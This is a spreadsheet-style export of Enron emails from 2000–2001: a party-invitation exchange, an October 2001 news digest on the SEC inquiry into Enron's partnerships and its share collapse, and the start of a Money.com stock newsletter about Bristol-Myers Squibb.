thoughtful of you to invite me.  I hope you have a great time.....(I'll send _x000D_
something to Ben in the gallery tomorrow)..._x000D_
_x000D_
Best,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Gallay, Hillary" &lt;HillaryG@WSG.com&gt; on 11/27/2000 02:43:25 PM_x000D_
To: jeff.shankman@enron.com_x000D_
cc:  _x000D_
Subject: Ben Macklowe's Birthday Party_x000D_
_x000D_
_x000D_
Jeff,_x000D_
It was a pleasure meeting you on Saturday evening.  I hope that you will be_x000D_
able to join us for Ben's 30th celebration.  I would love to send you an_x000D_
official invitation so if you wouldn't mind sending your address to me via_x000D_
this email I'd be happy to send you all of the details._x000D_
Saturday, December 16th at 8:45pm at Gonzales y Gonzales, dinner and_x000D_
dancing._x000D_
If you can make it let me know._x000D_
Thanks,_x000D_
Hillary_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 15:03:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'courtney.votaw@enron.com'})</t>
  </si>
  <si>
    <t>Stocks Close Higher As Investors Cheer Earnings News _x000D_
Dow Jones Business News- 10/22/01_x000D_
Enron Faces Holder Suit From Fincl Chief Pacts_x000D_
Dow Jones News Service- 10/22/01_x000D_
Shapiro Haber &amp; Urmy Files Class Action on Behalf of Purchasers of Enron Corporation Stock (NYSE: ENE) in The Period From July 13, 2001 Through October 16, 2001_x000D_
PR Newswire- 10/22/01_x000D_
Enron Board Approved Partnerships Run by Chief Financial Officer_x000D_
PR Newswire- 10/22/01_x000D_
USA: UPDATE 3-SEC looks into Enron deals, stock slides 20 pct._x000D_
Reuters English News Service- 10/22/01_x000D_
Enron shares plunge 20 percent after acknowledging SEC inquiry_x000D_
Associated Press Newswires- 10/22/01_x000D_
STOCKWATCH Enron lower after SEC questions transactions; AG Edwards downgrades_x000D_
AFX News- 10/22/01_x000D_
Enron Corp. Information requested by SEC._x000D_
Regulatory News Service- 10/22/01_x000D_
Enron Shares Slide as SEC Seeks Information on Deals With CFO's Partnership_x000D_
Dow Jones Business News- 10/22/01_x000D_
Enron Says SEC Asks About Related-Party Transactions (Update8)_x000D_
Bloomberg- 10/22/01_x000D_
UniPrime Signs Letter of Intent for Wind Energy Park Project_x000D_
Business Wire- 10/22/01_x000D_
_x000D_
_x000D_
Stocks Close Higher As Investors Cheer Earnings News_x000D_
By Peter Edmonston_x000D_
_x000D_
10/22/2001_x000D_
Dow Jones Business News_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
The Wall Street Journal Online _x000D_
Stocks rallied sharply Monday despite the widening anthrax scare, as a batch of better-than-expected quarterly earnings reports cheered investors._x000D_
The Dow Jones Industrial Average gained 172.92, or 1.9%, to close at 9377.03 after gaining 40.89 points Friday. The Nasdaq Composite Index rose 36.75, or 2.2%, to 1708.06 after climbing 18.59 points in the previous session. _x000D_
Other major stock indexes gained ground Monday. The Standard &amp; Poor's 500-stock index added 16.42 to 1089.90, the New York Stock Exchange Composite Index rose 7.13 to 561.45, and the Russell 2000 Index gained 4.80 to 430.50. _x000D_
Bonds were mixed and the dollar strengthened. _x000D_
The stock market's gains were tempered briefly by news that a postal worker in Washington, D.C., was diagnosed with anthrax contracted by inhalation. Additionally, two other postal workers in Washington have died and their deaths are being investigated to determine if they died of that same ailment. _x000D_
But stocks took the anthrax reports in stride, suggesting a new and surprising level of confidence among market participants, some analysts said Monday. "The market is really shrugging off this news," said Mark Donahoe, a managing director at U.S. Bancorp Piper Jaffray. _x000D_
Upbeat earnings news from American Express, released Monday afternoon, seemed to give stocks an additional lift. _x000D_
Investors may be shifting their focus away from concerns about anthrax exposure and U.S. military maneuvers in Afghanistan to take a closer look at quarterly earnings results, said Steven Kroll Sr., managing director at Monness, Crepsi &amp; Hardt. _x000D_
The uncertainty on the global front "looks like it is going to be a long, drawn-out affair," Mr. Kroll said. "I think stocks will revert back to being earnings-driven." _x000D_
Although dismal by ordinary standards, last week's flood of quarterly earnings reports got a reasonably upbeat reception from investors, who seem to have approached them with extremely low expectations. "The markets acted pretty well last week in light of some very ugly earnings," said Mr. Donahoe of U.S. Bancorp. That resilience might be giving hope to investors this week, he added. _x000D_
Still, investors will be carefully sifting through quarterly results in the coming week to get a fix on how the fourth quarter is shaping up, Mr. Kroll argued. _x000D_
Third-quarter earnings showed several pockets of strength on Monday, with big companies such as Minnesota Mining and Manufacturing and U.S. Steel posting results that met or topped analysts' estimates. _x000D_
The Dow industrials got an additional boost shortly after 2 p.m. EDT when index component American Express reported earnings that, excluding certain items, beat Wall Street previously lowered estimates. _x000D_
The financial-services concern posted net income of $298 million, or 22 cents a share, down 60% from $737 million, or 54 cents a share, a year earlier. Excluding charges related to a corporate restructuring and the September 11 attacks, American Express said it would have earned $595 million, or 45 cents a share, for the latest quarter. Analysts had been expecting earnings of 30 cents a share, according to Thomson Financial/First Call. _x000D_
Shares of American Express surged after the quarterly earnings release, closing up 3.4% at $30.32. _x000D_
Chip stocks helped lead the Nasdaq composite higher, with the Philadelphia semiconductor index gaining 5.4%. The rally seemed to be a continuation of Friday's gains in the sector, sparked by positive earnings news from KLA-Tencor. _x000D_
U.S. Steel, the nation's No. 1 steelmaker, said it swung to a third-quarter loss from a profit a year earlier, hurt by oversupply and a weak economy. But excluding charges related to the closure of one mill and damage at another, U.S. Steel said its loss was much narrower than what was forecast by analysts surveyed by Thomson Financial/First Call. Shares of U.S. Steel rose 9.7% to $14.74. _x000D_
Investors also sent 3M shares nearly 5% higher after the maker of chemical and adhesive products squeaked by Wall Street estimates, despite a 21% decline in net income. And oil producers Conoco and USX-Marathon Group handily beat analysts' forecasts. _x000D_
But not all the earnings news was cheery. Local phone company SBC Communications recorded net income that was slightly below estimates. Shares of SBC, a component of the Dow industrials, fell 5.1% to $41.40. _x000D_
Meanwhile, the outlook for corporate profits in the fourth quarter seems discouraging, some analysts noted. On Monday, 3M guided Wall Stret's earnings expectations lower for the upcoming quarter, and a top executive at U.S. Steel told analysts that the company's fourth quarter would be "difficult." _x000D_
Companies "are meeting third quarter expectations, but they are talking down the fourth quarter," said Mr. Kroll of Monness Crespi &amp; Hardt. He said that some of the rise in Monday's markets might be a carryover from Friday's buying activity related to the expiration of U.S. stock option and index option contracts, an event known as "double witching." _x000D_
One of the hardest-hit stocks on Monday was Enron, an energy concern that said that the Securities and Exchange Commission was seeking information about certain complex transactions it undertook with a limited partnership organized by its chief financial officer. Shares of Enron plunged 21% to $20.65. _x000D_
Overseas, stocks closed higher. London's Financial Times-Stock Exchange 100-Share Index gained 1.1%, while Frankfurt's Xetra DAX index rose 2%. Earlier in the day, Japan's Nikkei 225 average closed with a gain of 0.3%, but Hong Kong's Hang Seng Index ended 0.3% lower. _x000D_
In economic news, the Conference Board reported that its index of leading indicators for the month fell 0.5% in September, matching the estimates of economists surveyed by Thomson Global Markets. The index -- a composite of measurements aimed at forecasting likely changes in the economy -- included some data gathered after the Sept. 11 attacks. _x000D_
The decline, which was the index's largest one-month drop since January 1996, confirmed that the widespread weakness in the U.S. economy is deepening, the Conference Board said. Falling stock prices and rising initial unemployment claims were two of the index components that contributed most negatively to the September reading. _x000D_
In August, the leading-indicators index slipped 0.1%, less than the previous estimate of a 0.3% decline. Even so, the back-to-back declines paint a bleak economic picture, said Conference Board economist Ken Goldstein. _x000D_
The two-month decline in the index suggests that the already-weak economy is likely to remain weak into next year, Mr. Goldstein said. The overall reading from these numbers indicates that manufacturing and services are experiencing a significant slowdown. _x000D_
In major U.S. market action: _x000D_
Stocks rose. On the Big Board, where 1.09 billion shares were traded, 1,813 stocks rose and 1,291 fell. On the Nasdaq, 1.49 billion shares changed hands. _x000D_
Bonds were mixed. The 10-year Treasury note rose less than 1/16 point Monday, or 62.5 cents for each $1,000 invested. The yield, which moves inversely to its price, fell to 4.618%. The 30-year bond fell 1/16 point to yield 5.364%. _x000D_
The dollar rose. The dollar bought 122.56 yen, compared with 121.20 yen late Friday. The euro traded at 89.18 U.S. cents, down from 89.84 cents late Friday. _x000D_
Copyright (c) 2001 Dow Jones &amp; Company, Inc. _x000D_
All Rights Reserved._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Enron Faces Holder Suit From Fincl Chief Pacts_x000D_
_x000D_
10/22/2001_x000D_
Dow Jones News Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
NEW YORK -(Dow Jones)- A shareholder of Enron Corp. (ENE) filed a derivative suit in Texas court alleging that Enron's board breached their fiduciary duties to the company by allowing Chief Financial Officer Andrew Fastow to create and run certain limited partnerships. _x000D_
In a press release Monday, a law firm representing the unnamed shareholder said that Enron's board lost over $35 million by allowing Fastow to run these partnerships, which engaged in transactions with Enron and presented a conflict of interest._x000D_
The suit alleges that the limited partnerships bought Enron assets, permitting Fastow to use his inside knowledge of the company's financial condition to earn millions of dollars. _x000D_
On Oct. 16, Enron announced that it will take a $35 million charge relating to the limited partnerships and revealed that the company had to repurchase 55 million of its shares in order to unwind its involvement in the partnerships, thereby reducing the company's shareholder equity by $1.2 billion. _x000D_
On Monday, Enron said the Securities and Exchange Commission recently requested additional information regarding the limited partnerships. _x000D_
On Oct. 19, The Wall Street Journal reported that Fastow, and possibly a handful of partnership associates, realized more than $7 million last year in management fees and about $4 million in capital increases on an investment of nearly $3 million in the partnership, which was set up in Dec. 1999 principally to do business with Enron. _x000D_
Fastow has been finance chief of Enron since 1997 and has been with the firm 11 years, which included extensive work setting up and managing company investments. _x000D_
Enron's New York Stock Exchange listed shares fell to a 52-week low on Monday following news that the SEC requested additional information. _x000D_
A spokeswoman from Enron said the company has not seen the lawsuit and it does not comment on pending litigation. _x000D_
-Thomas Gryta; Dow Jones Newswires; 201-938-5400_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Shapiro Haber &amp; Urmy Files Class Action on Behalf of Purchasers of Enron Corporation Stock (NYSE: ENE) in The Period From July 13, 2001 Through October 16, 2001_x000D_
_x000D_
10/22/2001_x000D_
PR Newswire_x000D_
(Copyright (c) 2001, PR Newswire)_x000D_
BOSTON, Oct. 22 /PRNewswire/ -- The law firm of Shapiro Haber &amp; Urmy LLP has filed a class action suit alleging securities fraud in the United States District Court for the Southern District of Texas (Houston Division), 515 Rusk Ave., Houston, Texas 77002, against Enron Corporation ("Enron") (NYSE: ENE) and certain of its officers and directors. _x000D_
The case was filed on behalf of all purchasers of the common stock of Enron during the period from July 13, 2001 through October 16, 2001, inclusive (the "Class Period")._x000D_
The complaint alleges that the defendants violated section 10(b) of the Securities Exchange Act of 1934 ("the Exchange Act"), and Rule 10b-5 promulgated thereunder, and that defendants' wrongful conduct artificially inflated the price of Enron common stock during the Class Period. The complaint charges that the defendants misrepresented and concealed material facts concerning the Company's financial transactions with two partnerships established by Enron's Chief Financial Officer, which resulted in substantial losses to Enron and a reduction in shareholders' equity of over $1 billion. The price of Enron's common stock plummeted over 20% in just three trading days following disclosure of the financial losses resulting from Enron's dealings with these partnerships. _x000D_
Plaintiff seeks to recover damages suffered by class members and is represented by the law firm of Shapiro Haber &amp; Urmy LLP, which has successfully prosecuted numerous securities class actions on behalf of defrauded investors. More information about the firm and its qualifications is available on the firm's website at www.shulaw.com. _x000D_
If you are a member of the class described above, you may wish to join the action. You may move the court to serve as a lead plaintiff no later than December 21, 2001. _x000D_
If you would like a copy of the complaint, would like to discuss joining this action as a lead plaintiff, or would like to inform us that you are a member of the proposed class, please contact Thomas G. Shapiro, Esq. or Liz Hutton, paralegal, Shapiro Haber &amp; Urmy LLP, 75 State Street, Boston, MA 02109, (800) 287-8119, fax at (617) 439-0134, or e-mail at cases@shulaw.com. _x000D_
MAKE YOUR OPINION COUNT - Click Here _x000D_
http://tbutton.prnewswire.com/prn/11690X66791593_x000D_
_x000D_
/CONTACT: Thomas G. Shapiro, Esq. or Liz Hutton, paralegal, Shapiro Haber &amp; Urmy LLP, +1-800-287-8119, cases@shulaw.com/ 16:54 EDT _x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Enron Board Approved Partnerships Run by Chief Financial Officer_x000D_
_x000D_
10/22/2001_x000D_
PR Newswire_x000D_
(Copyright (c) 2001, PR Newswire)_x000D_
NEW YORK, Oct. 22 /PRNewswire/ -- An Enron (NYSE: ENE) shareholder has filed a derivative suit in Texas state court which charges that Enron's board of directors breached their fiduciary duties to the Company by allowing its CFO, Andrew Fastow to create and run certain limited partnerships. The Enron board lost the Company over $35 million by allowing Fastow to run these partnerships, which engaged in transactions with Enron and presented a clear conflict of interest for the Enron CFO. _x000D_
In addition to other transactions, the limited partnerships bought Enron assets, permitting Fastow to use his inside knowledge of the Company's financial condition to earn millions of dollars for himself and the limited partnerships. On October 16, 2001 the Company announced that it would take a $35 million charge relating to the limited partnerships. It was also revealed that the Company had to repurchase 55 million of its shares in order to unwind its involvement in the partnerships, thereby reducing the Company's shareholder equity by $1.2 billion._x000D_
On October 22, 2001, the Company announced that the SEC recently requested additional information regarding these limited partnerships. _x000D_
If you would like additional information regarding this lawsuit, you may contact Murielle Steven Walsh at Pomerantz Haudek Block Grossman &amp; Gross LLP, New York, New York, 888-476-6529 ((888) 4-POMLAW) or mjsteven@pomlaw.com. _x000D_
MAKE YOUR OPINION COUNT - Click Here _x000D_
http://tbutton.prnewswire.com/prn/11690X60348122_x000D_
_x000D_
/CONTACT: Murielle Steven Walsh, Esq. of Pomerantz Haudek Block Grossman &amp; Gross LLP, +1-888-476-6529 (+1-888-4-POMLAW), mjsteven@pomlaw.com/ 15:41 EDT _x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
USA: UPDATE 3-SEC looks into Enron deals, stock slides 20 pct._x000D_
By David Howard Sinkman_x000D_
_x000D_
10/22/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
NEW YORK, Oct 22 (Reuters) - Shares of Enron Corp. slumped more than 20 percent on Monday after it said U.S. regulators are looking into company transactions, another blow to a company whose chief executive resigned in August. _x000D_
A spokesman for North America's biggest buyer and seller of natural gas and electricity declined to discuss an inquiry by the U.S. Securities Exchange Commission, but said it was cooperating. The SEC also declined to outline details of its inquiry._x000D_
Investor confidence in the company has been rocked by reports from The Wall Street Journal about its relationship with two limited partnerships that were run until recently by Enron's chief financial officer, Andrew Fastow. The company also reported last week its first quarterly loss in more than four years, and took $1.01 billion in charges and writedowns on ill-fated investments. _x000D_
Problems at Enron surfaced two months ago when CEO Jeff Skilling resigned after only six months at the helm. _x000D_
Enron shares declined $5.49, or 21 percent, to $20.56 in Monday afternoon trade on the New York Stock Exchange, shaving off almost $4.2 billion of its market capitalization. The stock, the biggest decliner by percentage loss on the NYSE, fell as much as 22.8 percent on Monday, when it opened at its lowest level since September 1998. _x000D_
Shares declined 23 percent last week after the Journal ran its first story about the limited partnerships on Wednesday. _x000D_
Enron declined to comment on whether the SEC's inquiry into "certain related party transactions" involved the partnerships. _x000D_
"Related party transactions" is the heading used by Enron in its 1999 and 2000 annual reports to discuss dealings with its limited partnerships, LJM Cayman LP and the larger LJM2 Co-Investment LP, which engaged in complex hedging transactions involving company assets worth hundreds of millions of dollars. _x000D_
Fastow severed his ties to the partnerships in June. LJM was set up in June 1999 for energy-related investments, and LJM2 in December 1999 for energy-and communication-related investments. _x000D_
The Journal reported $35 million of its third-quarter loss of $638 million were connected with the limited partnerships _x000D_
Curt Launer, an analyst at Credit Suisse First Boston, said investors should question Enron's use of real value accounting when the value of certain assets, "most notably in telecommunications," have declined precipitously. _x000D_
"Investors have had several opportunities to question Enron's credibility and at each of those turns the share price has declined," Launer said. _x000D_
Some analysts, though, cautioned against assuming fire when there might only be smoke. _x000D_
"This is an inquiry, not an investigation, and I cannot imagine Enron's attorneys or accountants would allow it do to something illegal," said Merrill Lynch analyst Donato Eassey. _x000D_
"It's easy for the market to kick a company when its down, but these challenges do not last for a solid company, and we think Enron is one." _x000D_
Shares in the company are down 75 percent this year._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Enron shares plunge 20 percent after acknowledging SEC inquiry_x000D_
_x000D_
10/22/2001_x000D_
Associated Press Newswires_x000D_
Copyright 2001. The Associated Press. All Rights Reserved._x000D_
HOUSTON (AP) - Shares of Enron Corp. plunged more than 20 percent Monday after the energy trading giant said the Securities and Exchange Commission had sought information company's transactions with limited partnerships, which were managed by an Enron senior officer. _x000D_
In a statement, Enron said it had provided the regulatory agency with information in response to an inquiry last week._x000D_
"We welcome this request," Enron chairman and chief executive officer Kenneth L. Lay said in a statement Monday. "We will cooperate fully with the SEC and look forward to the opportunity to put any concern about these transactions to rest." _x000D_
Investors were upset by the news, however, sending shares of Enron down dlrs 5.30 to dlrs 20.75 in heavy trading on the New York Stock Exchange. _x000D_
The transactions took place in 1999 and 2000, according to Houston-based Enron's 2000 annual report. They resulted in a dlrs 16 million pre-tax gain to Enron in 1999 and a dlrs 36 million loss in 2000. _x000D_
Enron officials declined to provide details about the transactions or name the limited partnerships, instead referring questions to a section of the annual report on related party transactions. _x000D_
"Enron entered into transactions with (limited partnerships) to hedge certain merchant investments and other assets," according to the section in the annual report. _x000D_
Enron spokesman Mark Palmer said the SEC first contacted Enron last week and described the request is an "informal inquiry." _x000D_
"This is not an investigation," he said. "We see the request as an opportunity to put this issue behind us." _x000D_
SEC spokesman John Heine said he could not comment on the filings. "We can't confirm or deny that type of activity," Heine said. _x000D_
The electricity marketer and natural gas provider says both internal and external auditors and attorneys reviewed the related party arrangements, the company's board was fully informed of and approved the arrangements, and they were disclosed in the company's SEC filings._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
STOCKWATCH Enron lower after SEC questions transactions; AG Edwards downgrades_x000D_
_x000D_
10/22/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
NEW YORK (AFX) - Shares of Enron Corp were down sharply in late morning trade, after the Securities and Exchange Commission requested the company to provide information on certain related-party transactions, prompting AG Edwards to downgrade the stock to 'hold' from 'buy', dealers said. _x000D_
At 11.10 am, Enron was down 4.29 usd, or 16.47 pct, at 21.76. The DJIA was up 57.57 points at 9,261.68, and the S&amp;P 500 composite index was up 5.57 points at 1,079.05._x000D_
In a statement this morning, Enron confirmed that the SEC had requested documents, and said it would "cooperate fully" with the commission. _x000D_
However, the company did not give any details of the transactions concerned or of the reasons behind the SEC's request. _x000D_
According to AG Edwards analyst Mike Heim, Enron "significantly reduced" its equity to unroll a partnership arrangement with a partially-owned subsidiary formerly run by Enron's chief financial officer. _x000D_
"This arrangement, which was not discussed in past SEC filings, has led to a growing distrust of the company by the financial community. _x000D_
"In our opinion, the market is most likely overreacting to the news being disseminated over the last few days. _x000D_
"However, we can give no assurances that all the problems at Enron have been fully disclosed," Heim said. _x000D_
In its statement this morning, Enron said although its internal and external auditors and attorneys have reviewed the related-party arrangements, adding that the Board was "fully informed of and approved these arrangements", which were disclosed in the company's SEC filings. _x000D_
"We believe everything that needed to be considered and done in connection with these transactions was considered and done," said chief executive Kenneth Lay. _x000D_
ng/gc For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
Enron Corp. Information requested by SEC._x000D_
_x000D_
10/22/2001_x000D_
Regulatory News Service_x000D_
(C) 2001_x000D_
INTNTH 22 October 2001 _x000D_
ENRON ANNOUNCES SEC REQUEST, PLEDGES COOPERATION_x000D_
HOUSTON - Enron Corp. (NYSE: ENE) announced today that the Securities and Exchange Commission has requested that Enron voluntarily provide information regarding certain related party transactions. _x000D_
"We welcome this request," said Kenneth L. Lay, Enron chairman and CEO. "We will cooperate fully with the SEC and look forward to the opportunity to put any concern about these transactions to rest. In the meantime, we will continue to focus on our core businesses and on serving our customers around the world." _x000D_
Enron noted that its internal and external auditors and attorneys reviewed the related party arrangements, the Board was fully informed of and approved these arrangements, and they were disclosed in the company's SEC filings. "We believe everything that needed to be considered and done in connection with these transactions was considered and done," Lay said. _x000D_
Enron is one of the world's leading energy, commodities and services companies. The company markets electricity and natural gas, delivers energy and other physical commodities, and provides financial and risk management services to customers around the world. Enron's Internet address is www.enron.com. The stock is traded under the ticker symbol "ENE." _x000D_
END _x000D_
'MSCEAFEAALXFFFE._x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Enron Shares Slide as SEC Seeks Information on Deals With CFO's Partnership_x000D_
_x000D_
10/22/2001_x000D_
Dow Jones Business News_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
HOUSTON -- Shares of Enron Corp. slumped Monday after the energy-trading concern said the Securities and Exchange Commission has asked for information about "certain related party transactions," including those between Enron and a limited partnership organized by its chief financial officer. _x000D_
Enron promised to cooperate fully with the SEC request and said in a prepared statement that it "welcomes" the request and looks forward to put "any concern about these transactions to rest."_x000D_
In 4 p.m. EDT trading on the New York Stock Exchange, Enron (ENE) shares fell $5.40, or 21%, to $20.65. _x000D_
Last week The Wall Street Journal reported that a limited partnership organized by Andrew Fastow, Enron's chief financial officer, made millions in profits in transactions with the firm. The story cited information reported in an internal partnership document. _x000D_
Enron also said last week it will repurchase up to 55 million shares that it had issued as part of transactions with LJM2 CO-Investment LP, the limited partnership created by Mr. Fastow. _x000D_
In addition, Enron took a $1.01 billion charge in the third quarter, mostly connected with write-downs of bad investments, producing a loss of $618 million, or 84 cents a share. Excluding charges, income was $393 million, or 43 cents a share, in the quarter. _x000D_
The charge covers a wide range of items including costs related to the limited partnerships that were, until recently, by Mr. Fastow. _x000D_
The company said the costs connected with the partnerships total $35 million and involve the early termination of "certain structured finance arrangements." _x000D_
The partnerships were set up two years ago, and while the company maintains that they are perfectly proper, some have suggested that it is a conflict of interest for Enron's chief financial officer to be involved in a partnership that was looking to purchase Enron assets, the Journal reported. _x000D_
The energy company said its auditors reviewed the arrangements and its board was fully informed and approved the deals, which were disclosed in SEC filings. _x000D_
"We believe everything that needed to be considered and done in connection with these transactions was considered and done," Enron Chairman and Chief Executive Kenneth Lay said on Monday. _x000D_
Separately, an Enron shareholder filed a derivative lawsuit in Texas court alleging Enron's board breached its fiduciary duties to the company by allowing Mr. Fastow to create and run certain limited partnerships. _x000D_
A law firm representing the unnamed shareholder said in a prepared statement that Enron's board lost over $35 million by allowing Mr. Fastow to run these partnerships, which engaged in transactions with Enron and presented a conflict of interest. _x000D_
The suit alleges that the limited partnerships bought Enron assets, permitting Mr. Fastow to use his inside knowledge of the company's financial condition to earn millions of dollars. _x000D_
-- Bill Platt of Dow Jones Newswires contributed to this report. _x000D_
Copyright (c) 2001 Dow Jones &amp; Company, Inc. _x000D_
All Rights Reserved._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
_x000D_
Enron Says SEC Asks About Related-Party Transactions (Update8)_x000D_
2001-10-22 17:10 (New York)_x000D_
_x000D_
Enron Says SEC Asks About Related-Party Transactions (Update8)_x000D_
_x000D_
     (Adds in sixth paragraph that analyst estimates dissolving_x000D_
affiliated companies would cost $3 billion.)_x000D_
_x000D_
     Houston, Oct. 22 (Bloomberg) -- Enron Corp.'s shares fell 21_x000D_
percent after the Houston-based company said the Securities and_x000D_
Exchange Commission requested information on partnerships run by_x000D_
Chief Financial Officer Andrew Fastow and other executives._x000D_
_x000D_
     Enron, the largest energy trader, created partnerships and_x000D_
other affiliated companies to buy and sell assets such as power_x000D_
plants to lower the debt on its books. An investor sued Enron's_x000D_
board Wednesday, saying two partnerships cost the company $35_x000D_
million and Fastow's leadership of them was a conflict of_x000D_
interest._x000D_
_x000D_
     Investors today said they were concerned that Enron may be_x000D_
forced to dismantle the affiliated companies by paying off the_x000D_
owners in cash or stock. Chief Executive Ken Lay said last week he_x000D_
may be have to ``unravel'' agreements that created the companies_x000D_
if Enron's debt ratings fall too far._x000D_
_x000D_
     ``We need confidence their long-term credit rating won't go_x000D_
below investment grade,'' said Roger Hamilton, an analyst at John_x000D_
Hancock's value funds, which own 600,000 Enron shares._x000D_
_x000D_
      Enron reduced shareholders' equity by $1.2 billion when it_x000D_
repurchased 55 million shares of two such partnerships controlled_x000D_
by Fastow, LJM Cayman and LMJ2 Co-Investment, the Wall Journal_x000D_
reported last week._x000D_
_x000D_
     Dismantling more of the affiliated companies and partnerships_x000D_
would cost Enron or its shareholders as much as $3 billion, Ray_x000D_
Niles, a Salomon Smith Barney analyst, wrote in a report to_x000D_
investors today._x000D_
_x000D_
     Enron shares fell $5.40 to $20.65. They touched $19.67 during_x000D_
the day's trading, the lowest level since Jan. 15, 1998._x000D_
_x000D_
                           Shares Plunge_x000D_
_x000D_
     The stock has fallen 75 percent this year amid concerns about_x000D_
failed investments in trading of space on fiber-optic_x000D_
communications networks and a water company, and the resignation_x000D_
of Jeff Skilling as CEO in August after seven months on the job._x000D_
_x000D_
     While Skilling said he resigned for personal reasons,_x000D_
investors say his departure led them to question whether the_x000D_
company was concealing problems, including possible liabilities_x000D_
from affiliated companies._x000D_
_x000D_
     On Tuesday, Enron surprised many investors when it reported a_x000D_
$618 million third-quarter loss, the result of writing off $1.01_x000D_
billion in failed investments._x000D_
_x000D_
      Moody's Investors Service placed the company's debt on watch_x000D_
for possible downgrade. The company's debt is rated at investment_x000D_
grade by Fitch, Standard &amp; Poor's and Moody's._x000D_
_x000D_
     The company received a faxed request for information from the_x000D_
SEC on Wednesday asking for information, spokesman Mark Palmer_x000D_
said, and will respond ``as soon as possible.''_x000D_
_x000D_
     ``We will cooperate fully with the SEC and look forward to_x000D_
the opportunity to put any concern about these transactions to_x000D_
rest,'' Lay, who is also Enron's chairman, said in a statement._x000D_
_x000D_
                          Dilution Fears_x000D_
_x000D_
     Enron has formed at least 18 companies to serve as financing_x000D_
vehicles for its projects, based on filings with the Texas_x000D_
secretary of state. Fastow and other Enron executives are named as_x000D_
the controlling partners or the board members in the companies._x000D_
_x000D_
     Some have bought Enron assets such as power plants, removing_x000D_
the debt for those projects from Enron's books. That allows Enron_x000D_
to keep cash earned from the main trading business from supporting_x000D_
what it views as secondary businesses, Standard &amp; Poor's debt_x000D_
analyst Todd Shipman said._x000D_
_x000D_
      Enron brokers trades of electricity, natural gas and other_x000D_
commodities as well as owns power plants and natural-gas_x000D_
pipelines._x000D_
_x000D_
     Dismantling the affiliates would be costly. Whitewing_x000D_
Management, an affiliated company that has bought 14 Enron power_x000D_
plants and lists Fastow as managing director, holds 250,000_x000D_
preferred shares of Enron._x000D_
_x000D_
     Enron may have to convert the preferred shares to common_x000D_
stock if share prices fall below a certain level and the credit_x000D_
rating drops below investment grade, according to company filings._x000D_
That would dilute the value of common shareholders' investment._x000D_
_x000D_
     ``The concern is how many of these dilutive structures are_x000D_
out there?'' Shipman said. ``Investors are worried they might have_x000D_
to share their Enron earnings with a lot more people than they_x000D_
originally thought.''_x000D_
_x000D_
                        Worrisome Financing_x000D_
_x000D_
     Enron's auditors and attorneys reviewed the company's_x000D_
``related party arrangements,'' the board approved them, and they_x000D_
were disclosed in SEC filings, Enron said in its statement._x000D_
_x000D_
     That hasn't eased concerns. The reduction of shareholder_x000D_
equity by $1.2 billion from the LJM partnerships is reason to_x000D_
w</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 16:03:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'moneyadm2@timeinc.net'})</t>
  </si>
  <si>
    <t>Sivy on Stocks: In need of a new image</t>
  </si>
  <si>
    <t>SIVY ON STOCKS from money.com_x000D_
June 1, 2001_x000D_
_x000D_
*****************[ A D V E R T I S E M E N T ]****************_x000D_
Jump-start a child's College Fund with MONEY's $5000 QUICK CASH_x000D_
Sweepstakes! It's easy - just click the link below for your_x000D_
chance to enter to win $5000 Cash! Plus while you're at money.com,_x000D_
jumpstart your investments with a FREE Trial issue of MONEY!_x000D_
Click Here: http://www.money.com/scholarship_x000D_
**************************************************************_x000D_
_x000D_
In need of a new image_x000D_
_x000D_
Bristol-Myers is evolving from a consumer-products company to a drug giant._x000D_
But investors still haven't caught on._x000D_
_x000D_
By Michael Sivy_x000D_
_x000D_
When you've been plodding along your whole life, it's hard to change your_x000D_
image -- that's the challenge Bristol-Myers Squibb [BMY] now faces. Most_x000D_
investors still regard the company as a slow-growth consumer-products_x000D_
business defined by brand names such as Clairol and Excedrin. But they're_x000D_
missing something important. Over the past few years, Bristol-Myers has_x000D_
been repositioning itself as one of the nation's largest pharmaceutical_x000D_
firms. And when investors catch on, the stock could receive a valuation at_x000D_
least 30 percent above current levels._x000D_
_x000D_
I last recommended Bristol-Myers in September at $53.50 a share. The stock_x000D_
has always received lower valuations than Pfizer and Merck because it gets_x000D_
less than three-quarters of its sales from pharmaceuticals. But_x000D_
Bristol-Myers had been transforming itself, and for a while, it looked as_x000D_
if it was getting more respect. By January, the share price had risen_x000D_
nearly 40 percent to top $74. But since then, the shares have given back_x000D_
almost all their gains. One reason is that the company is posting flat_x000D_
earnings growth this year. Moreover, several of the company's top-selling_x000D_
drugs, such as Glucophage for diabetes, are facing competition from_x000D_
generics, which will force lower prices and eat into market share. Even so,_x000D_
the long-term outlook for the stock has actually improved._x000D_
_x000D_
On May 21, the company announced that it would sell Clairol to Procter &amp;_x000D_
